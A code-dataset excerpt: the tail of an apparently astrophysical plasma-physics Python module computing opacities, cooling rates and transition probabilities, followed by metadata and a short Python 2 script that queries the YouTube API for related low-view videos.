)
p_exc_cool = (coll_exc_coeff * electron_densities).multiply(
delta_E_yg.values, axis=0
)
p_exc_cool = (
p_exc_cool * level_number_density.loc[level_lower_index].values
)
p_exc_cool = self.set_index(p_exc_cool, yg_idx, reverse=False)
p_exc_cool = p_exc_cool.groupby(level="destination_level_idx").sum()
exc_cool_index = pd.MultiIndex.from_product(
[["k"], p_exc_cool.index.values, [0]],
names=list(yg_idx.columns) + ["transition_type"],
)
p_exc_cool = p_exc_cool.set_index(exc_cool_index)
p_coll = pd.concat(
[p_deexc_deactivation, p_deexc_internal, p_exc_internal, p_exc_cool]
)
return p_coll
class RawTwoPhotonTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_two_photon : pandas.DataFrame, dtype float
The unnormalized transition probabilities for two photon decay.
"""
outputs = ("p_two_photon",)
transition_probabilities_outputs = ("p_two_photon",)
def calculate(self, two_photon_data, two_photon_idx, density):
no_shells = len(density)
p_two_phot = two_photon_data.A_ul * two_photon_data.nu0 * H
p_two_phot = pd.concat([p_two_phot] * no_shells, axis=1)
# TODO: In principle there could be internal two photon transitions
p_two_phot = self.set_index(
p_two_phot,
two_photon_idx,
transition_type=-1,
reverse=False,
)
p_two_phot.index = p_two_phot.index.set_levels(
["two-photon"], level="destination_level_idx"
)
return p_two_phot
class TwoPhotonEmissionCDF(ProcessingPlasmaProperty):
"""
Attributes
----------
two_photon_emission_cdf : pandas.DataFrame, dtype float
The cumulative distribution function (CDF) for the frequencies of
energy packets emitted in two photon transitions. The tabulated CDF
is used to sample packet frequencies in the Monte Carlo simulation.
"""
outputs = ("two_photon_emission_cdf",)
def calculate(self, two_photon_data):
bins = 500
# The number of two photon transitions is very small
# and the CDF has to be calculated only once.
# There is no need to vectorize the calculation.
emission_cdfs = []
for index, row in two_photon_data.iterrows():
alpha = row.alpha
beta = row.beta
gamma = row.gamma
nu = np.linspace(0.0, row.nu0, bins)
y = nu / row.nu0
j_nu = self.calculate_j_nu(y, alpha, beta, gamma)
cdf = np.zeros_like(nu)
cdf[1:] = numba_cumulative_trapezoid(j_nu, nu)
cdf /= cdf[-1]
index_cdf = pd.MultiIndex.from_tuples([index] * bins)
cdf = pd.DataFrame({"nu": nu, "cdf": cdf}, index=index_cdf)
emission_cdfs.append(cdf)
return pd.concat(emission_cdfs)
@staticmethod
def calculate_j_nu(y, alpha, beta, gamma):
"""
Calculate two photon emissivity.
This function calculates the two photon emissivity in the frequency
scale based on Eq. 2 and Eq. 3 in Nussbaumer & Schmutz (1984). The
emissivity is not normalized since it is only used to calculate
relative emission probabilities.
Parameters
----------
y : numpy.ndarray, dtype float
Emission frequency divided by that of the normal line
transition corresponding to the two photon decay.
alpha : float
Fit coefficient.
beta : float
Fit coefficient.
gamma : float
Fit coefficient.
Returns
-------
numpy.ndarray, dtype float
Unnormalized two photon emissivity in the frequency scale.
"""
ay = y * (1 - y) * (1 - (4 * y * (1 - y)) ** gamma)
ay += alpha * (y * (1 - y)) ** beta * (4 * y * (1 - y)) ** gamma
j_nu = ay * y
return j_nu
class AdiabaticCoolingRate(TransitionProbabilitiesProperty):
"""
Attributes
----------
cool_rate_adiabatic : pandas.DataFrame, dtype float
The adiabatic cooling rate of the electron gas.
"""
outputs = ("cool_rate_adiabatic",)
transition_probabilities_outputs = ("cool_rate_adiabatic",)
latex_name = (r"C_{\textrm{adiabatic}}",)
def calculate(self, electron_densities, t_electrons, time_explosion):
cool_rate_adiabatic = (
3.0 * electron_densities * K_B * t_electrons
) / time_explosion
cool_rate_adiabatic = cooling_rate_series2dataframe(
cool_rate_adiabatic, destination_level_idx="adiabatic"
)
return cool_rate_adiabatic
class FreeFreeCoolingRate(TransitionProbabilitiesProperty):
"""
Attributes
----------
cool_rate_ff : pandas.DataFrame, dtype float
The free-free cooling rate of the electron gas.
ff_cooling_factor : pandas.Series, dtype float
Pre-factor needed in the calculation of the free-free cooling rate and
the free-free opacity.
Notes
-----
This implementation uses a free-free Gaunt factor of one for all species
and ionization stages, which is an approximation.
"""
outputs = ("cool_rate_ff", "ff_cooling_factor")
transition_probabilities_outputs = ("cool_rate_ff",)
latex_name = (r"C^{\textrm{ff}}",)
def calculate(self, ion_number_density, electron_densities, t_electrons):
ff_cooling_factor = self._calculate_ff_cooling_factor(
ion_number_density, electron_densities
)
cool_rate_ff = F_K * np.sqrt(t_electrons) * ff_cooling_factor
cool_rate_ff = cooling_rate_series2dataframe(
cool_rate_ff, destination_level_idx="ff"
)
return cool_rate_ff, ff_cooling_factor.values
@staticmethod
def _calculate_ff_cooling_factor(ion_number_density, electron_densities):
ion_charge = ion_number_density.index.get_level_values(1).values
factor = (
electron_densities
* ion_number_density.multiply(ion_charge ** 2, axis=0).sum()
)
return factor
class FreeFreeOpacity(ProcessingPlasmaProperty):
"""
Attributes
----------
cool_rate_ff : pandas.DataFrame, dtype float
The free-free cooling rate of the electron gas.
ff_cooling_factor : pandas.Series, dtype float
Pre-factor needed in the calculation of the free-free opacity.
"""
outputs = ("chi_ff_calculator",)
def calculate(self, t_electrons, ff_cooling_factor, electron_densities):
ff_opacity_factor = ff_cooling_factor / np.sqrt(t_electrons)
@njit(error_model="numpy", fastmath=True)
def chi_ff(nu, shell):
chi_ff = (
FF_OPAC_CONST
* ff_opacity_factor[shell]
/ nu ** 3
* (1 - np.exp(-H * nu / (K_B * t_electrons[shell])))
)
return chi_ff
return chi_ff
class FreeFreeFrequencySampler(ProcessingPlasmaProperty):
"""
Attributes
----------
nu_ff_sampler : float
Frequency of the free-free emission process
"""
outputs = ("nu_ff_sampler",)
def calculate(self, t_electrons):
@njit(error_model="numpy", fastmath=True)
def nu_ff(shell):
T = t_electrons[shell]
zrand = np.random.random()
return -K_B * T / H * np.log(zrand)
return nu_ff
class FreeBoundFrequencySampler(ProcessingPlasmaProperty):
"""
Attributes
----------
nu_fb_sampler : float
Frequency of the free-bounds emission process
"""
outputs = ("nu_fb_sampler",)
def calculate(
self, photo_ion_cross_sections, fb_emission_cdf, level2continuum_idx
):
phot_nus = photo_ion_cross_sections.nu.loc[level2continuum_idx.index]
photo_ion_block_references = np.pad(
phot_nus.groupby(level=[0, 1, 2], sort=False)
.count()
.values.cumsum(),
[1, 0],
)
phot_nus = phot_nus.values
emissivities = fb_emission_cdf.loc[level2continuum_idx.index].values
@njit(error_model="numpy", fastmath=True)
def nu_fb(shell, continuum_id):
start = photo_ion_block_references[continuum_id]
end = photo_ion_block_references[continuum_id + 1]
phot_nus_block = phot_nus[start:end]
em = emissivities[start:end, shell]
zrand = np.random.random()
idx = np.searchsorted(em, zrand, side="right")
return phot_nus_block[idx] - (em[idx] - zrand) / (
em[idx] - em[idx - 1]
) * (phot_nus_block[idx] - phot_nus_block[idx - 1])
return nu_fb
class TwoPhotonFrequencySampler(ProcessingPlasmaProperty):
"""
Attributes
----------
nu_two_photon_sampler : float
Frequency of the two-photon emission process
"""
outputs = ("nu_two_photon_sampler",)
def calculate(self, two_photon_emission_cdf):
nus = two_photon_emission_cdf["nu"].values
em = two_photon_emission_cdf["cdf"].values
@njit(error_model="numpy", fastmath=True)
def nu_two_photon():
zrand = np.random.random()
idx = np.searchsorted(em, zrand, side="right")
return nus[idx] - (em[idx] - zrand) / (em[idx] - em[idx - 1]) * (
nus[idx] - nus[idx - 1]
)
return nu_two_photon
class FreeBoundCoolingRate(TransitionProbabilitiesProperty):
"""
Attributes
----------
cool_rate_fb_total : pandas.DataFrame, dtype float
The total free-bound cooling rate of the electron gas.
cool_rate_fb : pandas.DataFrame, dtype float
The individual free-bound cooling rates of the electron gas.
p_fb_deactivation: pandas.DataFrame, dtype float
Probabilities of free-bound cooling in a specific continuum
(identified by its continuum_idx).
"""
outputs = ("cool_rate_fb_tot", "cool_rate_fb", "p_fb_deactivation")
transition_probabilities_outputs = ("cool_rate_fb_tot",)
latex_name = (r"C^{\textrm{fb, tot}}", r"C^{\textrm{fb}}")
def calculate(
self,
c_fb_sp,
electron_densities,
ion_number_density,
level2continuum_idx,
):
next_ion_stage_index = get_ion_multi_index(c_fb_sp.index)
n_k = ion_number_density.loc[next_ion_stage_index]
cool_rate_fb = c_fb_sp.multiply(electron_densities, axis=1) * n_k.values
cool_rate_fb_tot = cooling_rate_series2dataframe(
cool_rate_fb.sum(axis=0), "bf"
)
p_fb_deactivation = cool_rate_fb / cool_rate_fb_tot.values
# TODO: this will be needed more often; put it in a function
continuum_idx = level2continuum_idx.loc[p_fb_deactivation.index].values
p_fb_deactivation = p_fb_deactivation.set_index(
continuum_idx
).sort_index(ascending=True)
p_fb_deactivation.index.name = "continuum_idx"
return cool_rate_fb_tot, cool_rate_fb, p_fb_deactivation
class BoundFreeOpacity(ProcessingPlasmaProperty):
"""
Attributes
----------
chi_bf : pandas.DataFrame, dtype float
Bound-free opacity corrected for stimulated emission.
"""
outputs = ("chi_bf",)
latex_name = (r"\chi^{\textrm{bf}}",)
def calculate(
self,
photo_ion_cross_sections,
t_electrons,
phi_ik,
level_number_density,
lte_level_number_density,
boltzmann_factor_photo_ion,
):
x_sect = photo_ion_cross_sections["x_sect"].values
n_i = level_number_density.loc[photo_ion_cross_sections.index]
lte_n_i = lte_level_number_density.loc[photo_ion_cross_sections.index]
chi_bf = (n_i - lte_n_i * boltzmann_factor_photo_ion).multiply(
x_sect, axis=0
)
num_neg_elements = (chi_bf < 0).sum().sum()
if num_neg_elements:
raise PlasmaException("Negative values in bound-free opacity.")
return chi_bf
class BoundFreeOpacityInterpolator(ProcessingPlasmaProperty):
outputs = ("chi_bf_interpolator",)
def calculate(
self,
chi_bf,
photo_ion_cross_sections,
get_current_bound_free_continua,
level2continuum_idx,
):
# Sort everything by descending frequeny (i.e. continuum_id)
# TODO: Do we really gain much by sorting by continuum_id?
phot_nus = photo_ion_cross_sections.nu.loc[level2continuum_idx.index]
photo_ion_block_references = np.pad(
phot_nus.groupby(level=[0, 1, 2], sort=False)
.count()
.values.cumsum(),
[1, 0],
)
phot_nus = phot_nus.values
chi_bf = chi_bf.loc[level2continuum_idx.index].values
x_sect = photo_ion_cross_sections.x_sect.loc[
level2continuum_idx.index
].values
@njit(error_model="numpy", fastmath=True)
def chi_bf_interpolator(nu, shell):
"""
Interpolate the bound-free opacity.
This function interpolates the tabulated bound-free opacities
and cross-sections to new frequency values `nu`.
Parameters
----------
nu : float, dtype float
Comoving frequency of the r-packet.
shell : int, dtype float
Current computational shell.
Returns
-------
chi_bf_tot : float
Total bound-free opacity at frequency `nu`.
chi_bf_contributions : numpy.ndarray, dtype float
Cumulative distribution function of the contributions of the
individual bound free continua to the total bound-free opacity.
current_continua : numpy.ndarray, dtype int
Continuum ids for which absorption is possible for frequency `nu`.
x_sect_bfs : numpy.ndarray, dtype float
Photoionization cross-sections of all bound-free continua for
which absorption is possible for frequency `nu`.
"""
current_continua = get_current_bound_free_continua(nu)
chi_bfs = np.zeros(len(current_continua))
x_sect_bfs = np.zeros(len(current_continua))
for i, continuum_id in enumerate(current_continua):
start = photo_ion_block_references[continuum_id]
end = photo_ion_block_references[continuum_id + 1]
phot_nus_continuum = phot_nus[start:end]
nu_idx = np.searchsorted(phot_nus_continuum, nu)
interval = phot_nus_continuum[nu_idx] - phot_nus_continuum[nu_idx-1]
high_weight = (nu - phot_nus_continuum[nu_idx-1])
low_weight = (phot_nus_continuum[nu_idx] - nu)
chi_bfs_continuum = chi_bf[start:end, shell]
chi_bfs[i] = (chi_bfs_continuum[nu_idx]*high_weight + chi_bfs_continuum[nu_idx-1]*low_weight)/interval
x_sect_bfs_continuum = x_sect[start:end]
x_sect_bfs[i] = (x_sect_bfs_continuum[nu_idx]*high_weight + x_sect_bfs_continuum[nu_idx-1]*low_weight)/interval
chi_bf_contributions = chi_bfs.cumsum()
# If we are outside the range of frequencies
# for which we have photo-ionization cross sections
# we will have no local continuua and therefore
# no bound-free interactions can occur
# so we set the bound free opacity to zero
if len(current_continua) == 0:
chi_bf_tot = 0.0
else:
chi_bf_tot = chi_bf_contributions[-1]
chi_bf_contributions /= chi_bf_tot
return (
chi_bf_tot,
chi_bf_contributions,
current_continua,
x_sect_bfs,
)
return chi_bf_interpolator
class ContinuumOpacityCalculator(ProcessingPlasmaProperty):
outputs = ("chi_continuum_calculator",)
def calculate(self, chi_ff_calculator, chi_bf_interpolator):
@njit(error_model="numpy", fastmath=True)
def chi_continuum_calculator(nu, shell):
(
chi_bf_tot,
chi_bf_contributions,
current_continua,
x_sect_bfs,
) = chi_bf_interpolator(nu, shell)
chi_ff = chi_ff_calculator(nu, shell)
return (
chi_bf_tot,
chi_bf_contributions,
current_continua,
x_sect_bfs,
chi_ff,
)
return chi_continuum_calculator
class LevelNumberDensityLTE(ProcessingPlasmaProperty):
"""
Attributes
----------
lte_level_number_density : pandas.DataFrame, dtype float
"""
outputs = ("lte_level_number_density",)
latex_name = (r"n_{\textrm{i}}^*",)
# TODO: only do this for continuum species
def calculate(self, electron_densities, phi_ik, ion_number_density):
next_higher_ion_index = get_ion_multi_index(
phi_ik.index, next_higher=True
)
# TODO: Check that n_k is correct (and not n_k*)
lte_level_number_density = (
phi_ik * ion_number_density.loc[next_higher_ion_index].values
).multiply(electron_densities, axis=1)
return lte_level_number_density
class PhotoIonBoltzmannFactor(ProcessingPlasmaProperty):
"""
Attributes
----------
boltzmann_factor_photo_ion : pandas.DataFrame, dtype float
"""
outputs = ("boltzmann_factor_photo_ion",)
def calculate(self, photo_ion_cross_sections, t_electrons):
nu = photo_ion_cross_sections["nu"].values
boltzmann_factor = np.exp(-nu[np.newaxis].T / t_electrons * (H / K_B))
return boltzmann_factor
class CollIonRateCoeffSeaton(ProcessingPlasmaProperty):
"""
Attributes
----------
coll_ion_coeff : pandas.DataFrame, dtype float
The rate coefficient for collisional ionization in the Seaton
approximation. Multiply with the electron density and the
level number density to obtain the total rate.
Notes
-----
The rate coefficient for collisional ionization in the Seaton approximation
is calculated according to Eq. 9.60 in [1].
References
----------
.. [1] Hubeny, I. and Mihalas, D., "Theory of Stellar Atmospheres". 2014.
"""
outputs = ("coll_ion_coeff",)
latex_name = (r"c_{\textrm{i,}\kappa}",)
def calculate(self, photo_ion_cross_sections, t_electrons):
photo_ion_cross_sections_threshold = photo_ion_cross_sections.groupby(
level=[0, 1, 2]
).first()
nu_i = photo_ion_cross_sections_threshold["nu"]
factor = self._calculate_factor(nu_i, t_electrons)
coll_ion_coeff = 1.55e13 * photo_ion_cross_sections_threshold["x_sect"]
coll_ion_coeff = factor.multiply(coll_ion_coeff, axis=0)
coll_ion_coeff = coll_ion_coeff.divide(np.sqrt(t_electrons), axis=1)
ion_number = coll_ion_coeff.index.get_level_values("ion_number").values
coll_ion_coeff[ion_number == 0] *= 0.1
coll_ion_coeff[ion_number == 1] *= 0.2
coll_ion_coeff[ion_number >= 2] *= 0.3
return coll_ion_coeff
def _calculate_factor(self, nu_i, t_electrons):
u0s = self._calculate_u0s(nu_i.values, t_electrons)
factor = np.exp(-u0s) / u0s
factor = pd.DataFrame(factor, index=nu_i.index)
return factor
@staticmethod
def _calculate_u0s(nu, t_electrons):
u0s = nu[np.newaxis].T / t_electrons * (H / K_B)
return u0s
class CollRecombRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
coll_recomb_coeff : pandas.DataFrame, dtype float
The rate coefficient for collisional recombination.
Multiply with the electron density squared and the ion number density
to obtain the total rate.
Notes
-----
The collisional recombination rate coefficient is calculated from the
collisional ionization rate coefficient based on the requirement of detailed
balance.
"""
outputs = ("coll_recomb_coeff",)
latex_name = (r"c_{\kappa\textrm{i,}}",)
def calculate(self, phi_ik, coll_ion_coeff):
return coll_ion_coeff.multiply(phi_ik.loc[coll_ion_coeff.index])
class RawCollIonTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_coll_ion : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
collisional ionization.
p_coll_recomb : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
collisional recombination.
cool_rate_coll_ion : pandas.DataFrame, dtype float
The collisional ionization cooling rates of the electron gas.
"""
outputs = ("p_coll_ion", "p_coll_recomb", "cool_rate_coll_ion")
transition_probabilities_outputs = (
"p_coll_ion",
"p_coll_recomb",
"cool_rate_coll_ion",
)
latex_name = (
r"p^{\textrm{coll ion}}",
r"p^{\textrm{coll recomb}}",
r"C^{\textrm{ion}}",
)
def calculate(
self,
coll_ion_coeff,
coll_recomb_coeff,
nu_i,
photo_ion_idx,
electron_densities,
energy_i,
level_number_density,
):
p_coll_ion = coll_ion_coeff.multiply(energy_i, axis=0)
p_coll_ion = p_coll_ion.multiply(electron_densities, axis=1)
p_coll_ion = self.set_index(p_coll_ion, photo_ion_idx, reverse=False)
coll_recomb_rate = coll_recomb_coeff.multiply(
electron_densities, axis=1
) # The full rate is obtained from this by multiplying by the
# electron density and ion number density.
p_recomb_deactivation = coll_recomb_rate.multiply(nu_i, axis=0) * H
p_recomb_deactivation = self.set_index(
p_recomb_deactivation, photo_ion_idx, transition_type=-1
)
p_recomb_deactivation = p_recomb_deactivation.groupby(level=[0]).sum()
index_dd = pd.MultiIndex.from_product(
[p_recomb_deactivation.index.values, ["k"], [0]],
names=list(photo_ion_idx.columns) + ["transition_type"],
)
p_recomb_deactivation = p_recomb_deactivation.set_index(index_dd)
p_recomb_internal = coll_recomb_rate.multiply(energy_i, axis=0)
p_recomb_internal = self.set_index(
p_recomb_internal, photo_ion_idx, transition_type=0
)
p_coll_recomb = pd.concat([p_recomb_deactivation, p_recomb_internal])
cool_rate_coll_ion = (coll_ion_coeff * electron_densities).multiply(
nu_i * H, axis=0
)
level_lower_index = coll_ion_coeff.index
cool_rate_coll_ion = (
cool_rate_coll_ion
* level_number_density.loc[level_lower_index].values
)
cool_rate_coll_ion = self.set_index(
cool_rate_coll_ion, photo_ion_idx, reverse=False
)
cool_rate_coll_ion = cool_rate_coll_ion.groupby(
level="destination_level_idx"
).sum()
ion_cool_index = pd.MultiIndex.from_product(
[["k"], cool_rate_coll_ion.index.values, [0]],
names=list(photo_ion_idx.columns) + ["transition_type"],
)
cool_rate_coll_ion = cool_rate_coll_ion.set_index(ion_cool_index)
return p_coll_ion, p_coll_recomb, cool_rate_coll_ion
| 33.155755
| 127
| 0.642749
| 39,129
| 0.813341
| 0
| 0
| 11,543
| 0.239934
| 0
| 0
| 17,145
| 0.356378
|
b727e8a96c1fbd46e661c2a5b89a290d333e2329
| 1,805
|
py
|
Python
|
pull_related_videos.py
|
jgawrilo/youtube
|
553bfe4cf303bc06abf8173f5ed0f4deb3ede57f
|
[
"Apache-2.0"
] | 1
|
2017-01-13T12:57:06.000Z
|
2017-01-13T12:57:06.000Z
|
pull_related_videos.py
|
jgawrilo/youtube
|
553bfe4cf303bc06abf8173f5ed0f4deb3ede57f
|
[
"Apache-2.0"
] | null | null | null |
pull_related_videos.py
|
jgawrilo/youtube
|
553bfe4cf303bc06abf8173f5ed0f4deb3ede57f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from apiclient.discovery import build
from apiclient.errors import HttpError
from oauth2client.tools import argparser
import json
import os
import codecs
from bs4 import BeautifulSoup
import argparse
import requests
import sys
import googleapiclient
def get_video_info(vid, youtube):
response = youtube.videos().list(
part="id,snippet,contentDetails,statistics",
id=vid,
maxResults=1
).execute()
return response
def get_video_suggestions(youtube,vid):
try:
#print "Related to:", vid
search_response = youtube.search().list(
type="video",
part="id",
relatedToVideoId=vid,
maxResults=20
).execute()
for i in search_response["items"]:
#print float(get_video_info(i["id"]["videoId"],youtube)["items"][0]["statistics"]["viewCount"])
if float(get_video_info(i["id"]["videoId"],youtube)["items"][0]["statistics"]["viewCount"]) < 100000:
print i["id"]["videoId"]
except googleapiclient.errors.HttpError:
pass
# MAIN
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Pull some youtube.')
parser.add_argument("--key", help="https://cloud.google.com/console")
args = parser.parse_args()
# Set DEVELOPER_KEY to the API key value from the APIs & auth > Registered apps
# tab of
# https://cloud.google.com/console
# Please ensure that you have enabled the YouTube Data API for your project.
DEVELOPER_KEY = args.key
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey=DEVELOPER_KEY)
for f in os.listdir("../flashpoint/videos/"):
get_video_suggestions(youtube,f)
| 28.203125
| 113
| 0.67867
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 565
| 0.313019
|